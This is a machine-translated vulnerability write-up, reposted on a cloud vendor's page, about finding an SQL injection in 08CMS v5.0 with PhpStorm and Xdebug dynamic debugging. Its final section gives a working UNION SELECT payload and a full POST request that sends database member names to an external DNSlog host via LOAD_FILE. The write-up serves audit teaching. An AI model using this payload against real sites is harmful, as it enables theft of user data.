Dynamic Analysis Small Sample | 08CMS SQL Injection Analytics

Source: Internet
Author: User
Tags sql injection vc9

I spring and autumn writer: YANZM

0x00 background

This week, get a source material is 08cms, this source code in the official website does not open source download, need to buy, by a teacher to provide, audit time found this CMS data transfer more complex, use static analysis of the way bad operation, just this week small three upper (new computer), On the direct installation of Phpstorm+xdebug+xdebug-ext (Firefox) for dynamic analysis, this article is a SQL injection vulnerability as an example, the dynamic analysis of the drill, of course, the source code and other loopholes to be excavated, expect the teachers to exchange discussions.

0X01 Audit Process Dynamic Analysis environment configuration

Dynamic analysis combination: Phpstorm+xdebug+xdebug-ext (Firefox)

I believe that the small partners concerned about the public number so long this environment building should be no problem, here I will list a few configuration points. If you do not understand, you can refer to: http://www.cnblogs.com/xujian2016/p/5548921.html

Settings for PHP

First, according to the PHP version of the computer to download the appropriate Xdebug plug-in \php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll,:https://xdebug.org/download.php

Then configure the following configuration in the php.ini file to see if the Xdebug in Phpinfo is in effect after the configuration is complete.

[XDebug]

zend_extension= "D:\soft\phpStudy\PHPTutorial\php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll"

Xdebug.profiler_append = 0

xdebug.profiler_enable = 1

Xdebug.profiler_enable_trigger = 0

Xdebug.profiler_output_dir= "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"

Xdebug.trace_output_dir= "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"

Xdebug.profiler_output_name = "cache.out.%t-%s"

xdebug.remote_enable = 1

Xdebug.remote_handler = "DBGP"

Xdebug.remote_host = "127.0.0.1″

Xdebug.remote_port = 9000

Xdebug.idekey = Phpstorm

Settings for Phpstorm

Configure the runtime environment to load the location where the Php.exe is located.

Configure the debug port, which by default is 9000 consistent with the debug port in php.ini.

Configure the proxy port and IDE key, and the port is consistent with the site port.

At the edit structure, make the following settings:

Xdebug-ext (Firefox)

Firefox is best to use the developer version or many plugins won't work.

After installing the Xdebug-ext plugin, configure the IDE key in the settings.

Basic use

When accessing the target page to be debugged, turn on phpstorm Debug Connection monitor, that is the small phone.

Then Firefox opens the little ladybird.

When the request is turned on, it will be automatically xdebug_session=phpstorm,ide and can be debugged.

SQL injection Problem 0x00 related environment

SOURCE information: 08cms_v5.0_gbk_20140314

Question file: \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\field.fun.php

Vulnerability type: SQL injection problem

Site Address: http://www.08cms.com/

0x01 Vulnerability Analysis

This 08cms source material data transfer is more complex, so there is no way to use notepad++ for static tracking and auditing, but instead of using Phpstorm+xdebug+xdebug-ext (Firefox) combination, dynamic analysis and data flow tracking.

Sign in to the Member center after registering a member at the site.

On the left basic information--basic information--member details-upload attachment above the input box, after a brief test, know that this place is the image path after uploading.

In the See box on the plug-in habit (storing the path of the input box Code rules complex), began to test, found that the location can introduce single quotation marks.

However, when constructing the SQL statement, it is found that the location has the input data processing, so the black box is not a good way to construct payload, so start debugging, because the submitted form link is http://127.0.0.1:8081/adminm.php? action=memberinfo_pthy&mid=2, so I set a breakpoint on line 10th in the file \08cms\08cms_v5.0_gbk_20140314\upload_gbk\adminm.php.

First, turn on the phone tag in the Phpstorm and listen for the debug connection.

Then the form submitted, open Xdebug-ext (Firefox) will automatically hit the Debug IDE Key, and then all the way F8 step, know to run to the breakpoint F7 step into, and then still F8.

Enter \08cms\08cms_v5.0_gbk_20140314\upload_gbk\libs\classes\frontpage\ on the 2nd time The end of line 15th in the adminmpagebase.cls.php file is finished, and after the end of the SQL log, the SQL can be introduced into the single quotation mark, so the breakpoint is in this position.

After repeated the next breakpoint F8 step and F7 into, run to the end of the location of the breakpoint, the next time the code executes to that position F7 step into. Eventually traced to the problematic block of code.

The following is the position of the breakpoint at the time of my tracking, which is the process of code running and data passing.

After confirming the location of the problem code, you can remove the other breakpoints, then keep only the breakpoint at the critical position, \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\ field.fun.php Here I only keep the 150th breakpoint.

By parsing the code block, the value of the variable is displayed on the right side of the code when it is debug, found to be processed by the | and #, and then passed into the SQL statement after basename processing, and 08cms is escaping the single quotes of the passed arguments. Although the single quotes are escaped here, the backslash is eaten by the basename, which introduces the single quotation mark into the SQL statement, resulting in SQL injection.

0x02 Vulnerability Replication

The following request can be made at Fmdata[mlogo] location ' Union Select Load_file (CONCAT (0x5c5c, (select Hex (group_concat) from Mname where 1 LIMIT 1), 0x2e6d7973716c2e38353731653539342e326d312e70772f2f616263) – Incoming this payload, you can query the data in the database, you need to note that When constructing payload, in addition to the opening single quotation marks, other places to avoid the use of single quotation marks, otherwise, because the single quotation mark is escaped as \ ', after basename will break the structure of the statement.

POST [Url]http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy&mid=2[/url] http/1.1

host:127.0.0.1:8081

Proxy-connection:keep-alive

content-length:1563

Cache-control:max-age=0

Origin: [Url]http://127.0.0.1:8081[/url]

Upgrade-insecure-requests:1

user-agent:mozilla/5.0 (Windows NT 10.0; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/55.0.2883.87 safari/537.36

Content-type:multipart/form-data; boundary=--webkitformboundaryhubb3majcygbjr0q

accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: [Url]http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy[/url]

Accept-encoding:gzip, deflate, BR

accept-language:zh-cn,zh;q=0.8

Cookie:vgm_userauth=icwfvar8isej5t3p9bvhw%2bzltvqmlhl8vms0iij3zoeol2%2fa%2fax8vtdh

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "_08_hash"

5228bb59d0b24b049a00dbc1c21fae97

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[nicename]"

Thinking

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[mlogo]"

[url]http://127.0.0.1:8081/userfiles/image/20180328/' union[/url] Select Load_file (CONCAT (0x5c5c, (select Hex (GROUP _concat (Mname)) from Cms_members where 1 LIMIT 1), 0x2e6d7973716c2e38353731653539342e326d312e70772f2f616263)) –1a= 28164700edc421674c5194.jpg

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[phone]"

18988888888

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[email]"

[Email] [Email protected] [/email]

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "FMDATA[QQ]"

88888888

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "FMDATA[COID20]"

0

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[birthday]"

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "fmdata[**]"

1

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[education]"

1

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Fmdata[profession]"

--webkitformboundaryhubb3majcygbjr0q

Content-disposition:form-data; Name= "Bsubmit"

{

--webkitformboundaryhubb3majcygbjr0q–

View Dnslog after the request can obtain the query data.

0x02 Summary

This article takes 08cms SQL injection vulnerability as an example to share with you the dynamic analysis method I use, there are also teachers recommend the use of Vscode, see everyone's usage habits, I am accustomed to use phpstorm, if the teachers have other good audit methods can also be proposed, welcome to provide audit materials together to learn progress, But if it is HC please go away and do not disturb, exchange study can contact me.

Note: This article is limited to study and research use and is prohibited for illegal use. All illegal uses, unrelated to the original author.

Dynamic Analysis Small Sample | 08CMS SQL Injection Analytics

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.